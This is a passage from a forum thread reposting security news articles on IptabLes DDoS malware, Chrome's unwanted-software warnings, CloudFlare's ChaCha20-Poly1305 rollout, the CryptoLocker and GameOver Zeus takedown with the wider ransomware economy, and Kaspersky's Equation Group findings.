remains online and is a malware repository responding to XML HTTP Requests (XHR) from the exploit. A file called getsetup.exe is sent to the compromised server along with another executable, ko.exe, which drops IptabLes. Barnett said detection rates are high for the hash of getsetup.exe. IptabLes is a troublesome DDoS tool, capable of synflood and DNSflood attacks. It installs itself into boot for persistence, according to the SpiderLabs research, which added that IptabLes has been widely reported targeting Linux and Unix servers. The vulnerability being targeted was submitted last September. “It’s not very sophisticated, and a lot of times these types of attacks don’t have to be,” Barnett said. “These guys are concerned with scale because they’re running botnets. What makes botnets so nice to the criminals running them is that they don’t care to be stealthy. They can send attacks blindly, and if they’re shut down, they just move on.” Source
  22. Google yesterday announced that it would expand its browser security efforts with a new warning in Chrome about unwanted software to caution users about accessing sites that are known to encourage unsafe downloads. The Mountain View, Calif., search and browsing giant has invested serious resources into its safe browsing features over the past several years. The company revamped its malware and bad SSL certificate warnings last year following a pair of studies seeking to determine how browser-based warnings could effectively stop users from clicking through to potentially dangerous content. To this point, a user would trigger Google’s unwanted software warning in Chrome just as he attempted to download sketchy content. Now the warnings kick in as the user attempts to browser directly to a site or in Google search results leading to the site. “If you’re a site owner, we recommend that you register your site with Google Webmaster Tools,” wrote Google software engineer, Lucas Ballard. “This will help you stay informed when we find something on your site that leads people to download unwanted software, and will provide you with helpful tips to resolve such issues.” Early last year, Google ruffled some feathers by announcing it would block malicious file downloads by default in its Chrome browser. While some expressed concern about Google acting as a gatekeeper for acceptable content, the company ultimately went forward with the move. Yesterday’s announcement takes Google’s year-old decision one step further, allowing the company to encourage users not to visit certain sites as opposed to encouraging them not to download certain files. Later in 2014, the company expanded its definition of unwanted software to include programs that purport to be something they are not or make unwanted changes to the user’s browser. Source
  23. After rolling out free SSL for its users last fall, CloudFlare has deployed a new level of encryption on its service that hardens and speeds up the user experience, especially when accessing domains via mobile browsers. The form of encryption, a relatively new transport layer cipher suite known as ChaCha20-Poly1305, has largely been used by Google until now. But as of yesterday, it is being used on 10 percent of CloudFlare’s HTTPS connections with more to follow. CloudFlare’s Nick Sullivan, who described the move on the company’s blog yesterday, called the cipher fast, useful and its security level “more than sufficient” for HTTPS. The algorithm is based on a combination of two other ciphers, ChaCha20 and Poly1305 MAC, both crafted by cryptographer Daniel Bernstein in 2008 and 2005 respectively. After being batted around for a bit, it surfaced in Chrome 31 in November 2013. Sullivan points out that the cipher, when paired with TLS, should excel at bridging the gap between having secure encryption on mobile browsers and APIs. While the cipher will fill that void, it also improves upon two other alternatives, RC4, which of course has its many foibles, and AES-GCM, which can cost a fortune depending on the way its implemented. It also helps that ChaCha20-Poly1305 is three times faster than AES-128-GCM on mobile services – the cipher provides 256 bits of security over GCM’s 128 – something that should reduce the strain of batteries on mobile devices. “Spending less time on decryption means faster page rendering and better battery life,” Sullivan wrote. The content delivery network explains that the change is partly fueled by the rest of the web’s fervent push towards HTTPS but that the move could also be seen as a foreshadowing of the cipher’s future widespread adoption. Sullivan acknowledges that Mozilla is planning on adding support for it in Firefox and that at the very least, using the cipher is a good fallback in case someone digs up a bug in AES-GCM, the algorithm primarily being used right now, in the near future. Source
  24. On May 30, 2014, law enforcement officials from the FBI and Europol seized a series of servers that were being used to help operate the GameOver Zeus botnet, an especially pernicious and troublesome piece of malware. The authorities also began an international manhunt for a Russian man they said was connected to operating the botnet, but the most significant piece of the operation was a side effect: the disruption of the infrastructure used to distribute the CryptoLocker ransomware. The takedown was the result of months of investigation by law enforcement and security researchers, many of whom were collaborating as part of a working group that had come together to dig into CryptoLocker’s inner workings. The cadre of researchers included reverse engineers, mathematicians and botnet experts, and the group quickly discovered that the gang behind CryptoLocker, which emerged in 2013, knew what it was doing. Not only was the crew piggybacking on the GameOver Zeus infections to reach a broader audience, but it also was using a sophisticated domain-generation algorithm to generate fresh command-and-control domains quickly. That kept the CryptoLocker crew ahead of researchers and law enforcement for a time. “The interesting thing is all the opsec involved in this. The architecture thought out with this was really clear. The people working on this really sat down and architected and then engineered something,” said Lance James of Deloitte & Touche, who spoke about the takedown effort at Black Hat last year. “It took a lot more people on our side to hit it harder.” CryptoLocker has become the poster child for a new wave of threats that are designed to relieve victims of their money through the threat of losing all of their files. The malware, like its descendants Cryptowall, Critroni, Crowti and many others, encrypt the contents of victims’ PCs and demands a payment, usually in Bitcoin, in order to get the decryption key. Millions of victims have been hit by these threats in the last couple of years, but putting a number on infections and a dollar value on how much money the crews are making is difficult. However, with ransom payments ranging from less than $100 to as much as $300 or more, the criminals behind these ransomware families are building multimillion dollar businesses on the fear and desperation of their victims. Despite the sudden appearance of CryptoLocker and the other more recent kinds of ransomware, the concept itself is not new. As far back as the late 1980s, early versions of crypto ransomware were showing up and security researchers began looking at the problem by the mid-1990s. By the mid-2000s, more and more crypto ransomware variants were popping up, but it wasn’t until CryptoLocker reared its head in 2013 that the scope and potential damage of the threat came into sharp focus. Victims, researchers and law enforcement soon realized that the game had changed. “Just imagine the scale of how many people are being held for ransom with these threats. It’s mind-boggling,” said Anup Ghosh, CEO of security vendor Invincea, which has done research on ransomware threats. “It’s someone else’s problem until your own personal information gets encrypted and you can’t access your work data and photos. The personal pain is so much more dramatic than any other intrusion.” For all the attention that CryptoLocker and Cryptowall and the other variants have gotten from the media and security researchers, enterprises haven’t yet totally caught on to the severity of the threat. Much of the infection activity by crypto ransomware has targeted consumers thus far, as they’re more likely to pay the ransom to get their data back. But Ghosh said that’s likely to change soon. “It’s not even on their radar. It’s similar to banking Trojans in terms of what IT guys think of it,” Ghosh said. “They treat it as an individual problem and as a reason to slap people on the wrist. ‘Oh, you must have done something bad’.” Ransomware gangs use a variety of methods to infect new victims, including riding shotgun on other malware infections and through drive-by downloads. But perhaps the most common infection method is through spam messages carrying infected attachments. These often look like FedEx shipping notifications or fake invoices. When a user opens the attachment, the malware infects the machine and encrypts the files. But the crypto ransomware gangs don’t operate on their own. They have support systems, developers and other systems in place to help them create their malware and cash out the profits. “CryptoLocker and GameOver Zeus were often installed alongside each other, and now you see these groups improving from there and specializing,” said John Miller, manager, ThreatScape cyber crime, at iSIGHT Partners. “There’s so much momentum behind ransomware operations and the black markets that support it, we expect it to be a problem for the foreseeable future. There are people selling ransomware, customization services for countries and distribution services for getting it onto machines or phones.” How much money is involved? Millions and millions of dollars. In just the first six months of operation, the Cryptowall malware generated more than a million dollars in revenue for its creators, according to research from Dell SecureWorks. That’s one group using one variant of crypto ransomware. And there are dozens, if not hundreds, of other groups running similar operations. Where CryptoLocker innovated with the use of strong encryption and demand for Bitcoin as ransom, other groups have taken the concept and run with it. The Critroni, or CTB-Locker, ransomware not only accepts Bitcoin, but it also uses elliptic curve cryptography and employs the Tor network for command-and-control. The group behind Cryptowall also goes to some lengths to ensure that the ransomware is on the right kind of machine before it runs. “They went through a lot of work to hide the executable in encryption, to check if it’s running in a virtual machine, and the ability to exploit multiple environments,” said Cisco Talos security research engineer Earl Carter. “So much was put into Cryptowall 2.0. Someone went to a lot of work on the front end to avoid detection.” The piles of money and growing complaints from victims has begun to draw the attention of law enforcement, as evidenced by the GameOver Zeus-CryptoLocker takedown and actions against the Reveton ransomware operation. Researchers expect the level of law enforcement interest to grow, especially as ransomware infects more enterprises and the profits for attackers continue to grow. “Now that it’s become apparent how much damage ransomware is causing, law enforcement is paying attention,” Miller said. “It’s gotten their attention in a big way. It’s in their scope. But it hasn’t been targeted very much by takedown activity. A lot of the criminals operating this feel that because what they’re doing is stealing virtual currency from individuals it’s less likely to see law enforcement attention. “The biggest reason this environment will change is sustained law enforcement action.” Source
  25. Kaspersky Lab’s global research and analysis team uncovered what they claim is the most sophisticated advanced persistent threat group yet known. Known as the Equation Group, researchers led by GReAT director Costin Raiu say the threat actors have been operating for 15 years or more and are known to have intercepted and maliciously modified hardware and CDs. Beyond that, the Equation Group is known to have had access to a pair of zero-day vulnerabilities that would eventually be used in the infamous Stuxnet attacks. We caught up with Kaspersky Lab principal security researcher Vitaly Kamluk at the company’s Security Analyst Summit in Cancun, Mexico. Source
×
×
  • Create New...